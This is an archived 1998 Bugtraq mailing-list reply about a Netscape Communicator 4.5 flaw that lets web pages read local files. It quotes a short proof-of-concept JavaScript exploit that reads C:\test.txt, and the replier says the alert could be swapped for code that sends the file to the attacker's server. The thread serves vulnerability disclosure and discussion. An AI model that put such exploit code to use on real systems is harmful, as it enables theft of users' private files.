[8627] in bugtraq
Re: Netscape Communicator 4.5 can read local files
daemon@ATHENA.MIT.EDU (Andrew McNaughton)
Tue Nov 24 23:31:48 1998
Date: Wed, 25 Nov 1998 17:19:41 +1300
Reply-To: andrew@squiz.co.nz
From: Andrew McNaughton <andrew@SQUIZ.CO.NZ>
X-To: Bill Lavalette <BillL@METAINFO.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <c=US%a=_%p=MetaInfo%l=LEGO-981123193152Z-8150@lego.metainfo.com>
The demonstration exploit puts your file on screen, but could as easily
have passed it back to the server the javascript came from. simply
replace alert(b) with appropriate code.
Andrew McNaughton
On Mon, 23 Nov 1998, Bill Lavalette wrote:
> Hi -
> this appears to be no different then typing c:\ in the location of any
> browser hardly a security hole in my opinion the test site did not
> prove that this is a potential or current problem.
>
> >The Javascript code is:
> >
> >sl=window.open("wysiwyg://1/file:///C|/");
> >sl2=sl.window.open();
> >sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
> >file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
> >java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
> >(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";
